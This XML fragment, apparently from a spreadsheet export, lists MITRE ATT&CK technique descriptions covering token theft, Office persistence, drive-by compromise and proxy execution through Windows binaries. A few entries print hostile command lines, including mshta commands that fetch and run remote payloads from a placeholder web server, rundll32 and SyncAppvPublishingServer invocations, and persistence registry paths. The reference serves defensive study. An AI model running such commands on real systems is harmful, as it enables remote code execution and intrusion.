    <s v="An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)_x000a__x000a_Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later."/>
  </r>
  <r>
    <x v="63"/>
    <x v="4"/>
    <s v="An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or &lt;code&gt;systemsetup&lt;/code&gt; on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)_x000a__x000a_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In addition, adversaries can discover device uptime through functions such as &lt;code&gt;GetTickCount()&lt;/code&gt; to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)_x000a__x000a_On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)_x000a__x000a_In addition, system calls – such as &lt;code&gt;time()&lt;/code&gt; – have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as &lt;code&gt;systemsetup -gettimezone&lt;/code&gt; or &lt;code&gt;timeIntervalSinceNow&lt;/code&gt; to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022)_x000a__x000a_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
  </r>
  <r>
    <x v="64"/>
    <x v="2"/>
    <s v="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_x000a__x000a_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_x000a__x000a_In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)"/>
  </r>
  <r>
    <x v="65"/>
    <x v="3"/>
    <s v="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
  </r>
  <r>
    <x v="65"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="65"/>
    <x v="3"/>
    <s v="Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)_x000a__x000a_Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges._x000a__x000a_ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)_x000a__x000a_Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)_x000a__x000a_Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)"/>
  </r>
  <r>
    <x v="66"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="67"/>
    <x v="0"/>
    <s v="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
  </r>
  <r>
    <x v="67"/>
    <x v="0"/>
    <s v="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
  </r>
  <r>
    <x v="67"/>
    <x v="0"/>
    <s v="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
  </r>
  <r>
    <x v="68"/>
    <x v="17"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="69"/>
    <x v="11"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="69"/>
    <x v="11"/>
    <s v="Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread._x000a__x000a_An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system._x000a__x000a_When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one."/>
  </r>
  <r>
    <x v="69"/>
    <x v="11"/>
    <s v="Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and &lt;code&gt;runas&lt;/code&gt;.(Citation: Microsoft RunAs)_x000a__x000a_Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process._x000a__x000a_While this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process."/>
  </r>
  <r>
    <x v="69"/>
    <x v="11"/>
    <s v="Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread._x000a__x000a_This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one."/>
  </r>
  <r>
    <x v="69"/>
    <x v="11"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="69"/>
    <x v="11"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="70"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="71"/>
    <x v="18"/>
    <s v="Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system._x000a__x000a_Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection."/>
  </r>
  <r>
    <x v="71"/>
    <x v="18"/>
    <s v="Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. _x000a__x000a_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_x000a__x000a_Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system."/>
  </r>
  <r>
    <x v="71"/>
    <x v="18"/>
    <s v="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Citation: Savill 1999)_x000a__x000a_Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system."/>
  </r>
  <r>
    <x v="71"/>
    <x v="18"/>
    <s v="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_x000a__x000a_In addition to user accounts, cloud accounts may be associated with services. Cloud providers handle the concept of service accounts in different ways. In Azure, service accounts include service principals and managed identities, which can be linked to various resources such as OAuth applications, serverless functions, and virtual machines in order to grant those resources permissions to perform various activities in the environment.(Citation: Microsoft Entra ID Service Principals) In GCP, service accounts can also be linked to specific resources, as well as be impersonated by other accounts for [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005).(Citation: GCP Service Accounts) While AWS has no specific concept of service accounts, resources can be directly granted permission to assume roles.(Citation: AWS Instance Profiles)(Citation: AWS Lambda Execution Role)_x000a__x000a_Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection._x000a__x000a_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
  </r>
  <r>
    <x v="72"/>
    <x v="18"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="72"/>
    <x v="18"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Word Normal.dotm location:&lt;br&gt;_x000a_&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;_x000a__x000a_Excel Personal.xlsb location:&lt;br&gt;_x000a_&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;_x000a__x000a_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_x000a__x000a_An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros."/>
  </r>
  <r>
    <x v="72"/>
    <x v="18"/>
    <s v="Adversaries may abuse the Microsoft Office &quot;Office Test&quo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_x000a__x000a_There exist user and global Registry keys for the Office Test feature, such as:_x000a__x000a_* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;_x000a_* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;_x000a__x000a_Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started."/>
  </r>
  <r>
    <x v="72"/>
    <x v="18"/>
    <s v="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_x000a__x000a_Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)"/>
  </r>
  <r>
    <x v="72"/>
    <x v="18"/>
    <s v="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_x000a__x000a_Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)_x000a_"/>
  </r>
  <r>
    <x v="72"/>
    <x v="18"/>
    <s v="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_x000a__x000a_Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)"/>
  </r>
  <r>
    <x v="72"/>
    <x v="18"/>
    <s v="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_x000a__x000a_Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. "/>
  </r>
  <r>
    <x v="73"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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r>
  <r>
    <x v="74"/>
    <x v="18"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek) "/>
  </r>
  <r>
    <x v="75"/>
    <x v="2"/>
    <s v="Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="76"/>
    <x v="1"/>
    <s v="Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:_x000a__x000a_*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_x000a_* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as &lt;code&gt;\\[remote address]\pic.png&lt;/code&gt; that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)"/>
  </r>
  <r>
    <x v="77"/>
    <x v="19"/>
    <s v="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_x000a__x000a_Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:_x000a__x000a_* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting_x000a_* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary_x000a_* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))_x000a_* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content)._x000a__x000a_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_x000a__x000a_Typical drive-by compromise process:_x000a__x000a_1. A user visits a website that is used to host the adversary controlled content._x000a_2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. _x000a_    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes._x000a_3. Upon finding a vulnerable version, exploit code is delivered to the browser._x000a_4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place._x000a_    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered._x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="78"/>
    <x v="19"/>
    <s v="Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration._x000a__x000a_Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-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_x000a__x000a_If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies._x000a__x000a_Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)_x000a__x000a_For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)"/>
  </r>
  <r>
    <x v="79"/>
    <x v="19"/>
    <s v="Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise._x000a__x000a_Supply chain compromise can take place at any stage of the supply chain including:_x000a__x000a_* Manipulation of development tools_x000a_* Manipulation of a development environment_x000a_* Manipulation of source code repositories (public or private)_x000a_* Manipulation of source code in open-source dependencies_x000a_* Manipulation of software update/distribution mechanisms_x000a_* Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware) _x000a_* Replacement of legitimate software with modified versions_x000a_* Sales of modified/counterfeit products to legitimate distributors_x000a_* Shipment interdiction_x000a__x000a_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
  </r>
  <r>
    <x v="79"/>
    <x v="19"/>
    <s v="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_x000a__x000a_Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. "/>
  </r>
  <r>
    <x v="79"/>
    <x v="19"/>
    <s v="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_x000a__x000a_Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "/>
  </r>
  <r>
    <x v="79"/>
    <x v="19"/>
    <s v="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
  </r>
  <r>
    <x v="80"/>
    <x v="20"/>
    <s v="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_x000a__x000a_The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)_x000a__x000a_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_x000a__x000a_BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)"/>
  </r>
  <r>
    <x v="81"/>
    <x v="19"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="82"/>
    <x v="19"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="83"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Password policies can be discovered in cloud environments using available APIs such as &lt;code&gt;GetAccountPasswordPolicy&lt;/code&gt; in AWS (Citation: AWS GetPasswordPolicy)."/>
  </r>
  <r>
    <x v="84"/>
    <x v="3"/>
    <s v="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Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)_x000a__x000a_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
  </r>
  <r>
    <x v="85"/>
    <x v="9"/>
    <s v="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_x000a__x000a_Several types exist:_x000a__x000a_### Browser-based Exploitation_x000a__x000a_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_x000a__x000a_### Office Applications_x000a__x000a_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_x000a__x000a_### Common Third-party Applications_x000a__x000a_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
  </r>
  <r>
    <x v="86"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also deceive users into performing actions such as:_x000a__x000a_* Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary_x000a_* Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)_x000a_* Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)_x000a_* Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)_x000a__x000a_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
  </r>
  <r>
    <x v="86"/>
    <x v="9"/>
    <s v="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
  </r>
  <r>
    <x v="86"/>
    <x v="9"/>
    <s v="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cpl, and .reg._x000a__x000a_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_x000a__x000a_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r>
  <r>
    <x v="86"/>
    <x v="9"/>
    <s v="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_x000a__x000a_Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)"/>
  </r>
  <r>
    <x v="87"/>
    <x v="21"/>
    <s v="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_x000a__x000a_Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s)._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="87"/>
    <x v="21"/>
    <s v="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_x000a__x000a_This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system._x000a__x000a_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r>
  <r>
    <x v="87"/>
    <x v="21"/>
    <s v="Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell._x000a__x000a_To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)_x000a__x000a_Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`.  Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage."/>
  </r>
  <r>
    <x v="88"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)_x000a__x000a_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
  </r>
  <r>
    <x v="89"/>
    <x v="6"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well."/>
  </r>
  <r>
    <x v="90"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="91"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained."/>
  </r>
  <r>
    <x v="92"/>
    <x v="2"/>
    <s v="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such as Credential Access, Lateral Movement, or Defense Evasion, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)). _x000a__x000a_The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:_x000a__x000a_* Policies, procedures, and standards_x000a_* Physical / logical network diagrams_x000a_* System architecture diagrams_x000a_* Technical system documentation_x000a_* Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)) _x000a_* Work / project schedules_x000a_* Source code snippets_x000a_* Links to network shares and other internal resources_x000a_* Contact or other sensitive information about business partners and customers, including personally identifiable information (PII) _x000a__x000a_Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include the following:_x000a__x000a_* Storage services such as IaaS databases, enterprise databases, and more specialized platforms such as customer relationship management (CRM) databases _x000a_* Collaboration platforms such as SharePoint, Confluence, and code repositories_x000a_* Messaging platforms such as Slack and Microsoft Teams _x000a__x000a_In some cases, information repositories have been improperly secured, typically by unintentionally allowing for overly-broad access by all users or even public access to unauthenticated users. This is particularly common with cloud-native or cloud-hosted services, such as AWS Relational Database Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"/>
  </r>
  <r>
    <x v="92"/>
    <x v="2"/>
    <s v="_x000a_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_x000a__x000a_* Policies, procedures, and standards_x000a_* Physical / logical network diagrams_x000a_* System architecture diagrams_x000a_* Technical system documentation_x000a_* Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))_x000a_* Work / project schedules_x000a_* Source code snippets_x000a_* Links to network shares and other internal resources_x000a_"/>
  </r>
  <r>
    <x v="92"/>
    <x v="2"/>
    <s v="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_x000a__x000a_* Policies, procedures, and standards_x000a_* Physical / logical network diagrams_x000a_* System architecture diagrams_x000a_* Technical system documentation_x000a_* Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))_x000a_* Work / project schedules_x000a_* Source code snippets_x000a_* Links to network shares and other internal resources_x000a_"/>
  </r>
  <r>
    <x v="92"/>
    <x v="2"/>
    <s v="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_x000a__x000a_Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)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_x000a__x000a_**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories."/>
  </r>
  <r>
    <x v="92"/>
    <x v="2"/>
    <s v="Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data._x000a__x000a_Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)_x000a__x000a_CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot."/>
  </r>
  <r>
    <x v="92"/>
    <x v="2"/>
    <s v="Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information.  _x000a__x000a_The following is a brief list of example information that may hold potential value to an adversary and may also be found on messaging applications: _x000a__x000a_* Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008)) _x000a_* Source code snippets _x000a_* Links to network shares and other internal resources _x000a_* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)_x000a_* Discussions about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker 2021)(Citation: Microsoft DEV-0537)_x000a__x000a_In addition to exfiltrating data from messaging applications, adversaries may leverage data from chat messages in order to improve their targeting - for example, by learning more about an environment or evading ongoing incident response efforts.(Citation: Sentinel Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"/>
  </r>
  <r>
    <x v="93"/>
    <x v="3"/>
    <s v="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
  </r>
  <r>
    <x v="93"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="93"/>
    <x v="3"/>
    <s v="Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv)_x000a_    _x000a_The SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\System32` through the command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv)_x000a__x000a_Adversaries may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and evade defensive counter measures by &quot;living off the land.&quot;(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation: 7 - appv)_x000a__x000a_For example,  [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may be invoked using:(Citation: 5 - appv)_x000a__x000a_`SyncAppvPublishingServer.vbs &quot;n; {PowerShell}&quot;`"/>
  </r>
  <r>
    <x v="94"/>
    <x v="4"/>
    <s v="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_x000a__x000a_Browser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser._x000a__x000a_Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)"/>
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Similarly, on Linux systems adversaries may abuse trusted binaries such as &lt;code&gt;split&lt;/code&gt; to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)"/>
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="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_x000a__x000a_InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation: LOLBAS Installutil)"/>
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)_x000a__x000a_Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute(&quot;GetObject(&quot;&quot;script:https[:]//webserver/payload[.]sct&quot;&quot;)&quot;))&lt;/code&gt;_x000a__x000a_They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;_x000a__x000a_Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)"/>
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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quot;C:\Users\Public\file.dll&quot;&amp;rbrace;&lt;/code&gt;). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) _x000a_"/>
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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quot;Squiblydoo&quot; and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)_x000a__x000a_Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)"/>
  </r>
  <r>
    <x v="95"/>
